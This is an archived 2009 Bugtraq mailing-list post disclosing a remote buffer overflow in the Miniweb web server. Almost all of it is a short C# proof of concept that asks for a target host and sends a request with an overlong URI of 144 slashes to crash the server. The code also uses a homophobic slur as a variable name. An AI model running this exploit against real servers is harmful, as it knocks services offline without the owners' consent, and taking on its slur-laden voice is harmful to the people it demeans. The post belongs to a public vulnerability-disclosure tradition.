lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <200904161544.n3GFijtX010594@www3.securityfocus.com>
Date: Thu, 16 Apr 2009 09:44:45 -0600
From: ew1zz@...tspammepls.com
To: bugtraq@...urityfocus.com
Subject: Miniweb Buffer Overflow

################### Miniweb Remote Buffer Overflow ############################

########By: e.wiZz!

########Site: www.balcansecurity.com

######## Found with ServMeNot (world's sexiest fuzzer :P )



In the wild...
#################################################################

/* BoF when requesting URI longer than 120~ */

using System;
using System.IO;
using System.Net;
using System.Text;

namespace idiot
{
    class pf
    {
        static void Main(string[] args)
        {
            Console.Write("Enter host:\n");
            string site = Console.ReadLine();
            string uri = null;
            try
            {
                for (int i = 0; i < 144; i++) { uri += "/"; }
                HttpWebRequest request = (HttpWebRequest)
                    HttpWebRequest.Create(site + uri);
                HttpWebResponse response = (HttpWebResponse)

                    request.GetResponse();

                //any response we get means that exploit failed
                if (response.GetResponseHeader("Content-Lenght") != "a")
                {
                    Console.WriteLine("Exploit failed");
                }

            }
            catch (Exception gayexception)
            {
                Console.WriteLine("Cannot connect");
                Console.WriteLine("{0}", gayexception.Message);
            }
        }
    }
}

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ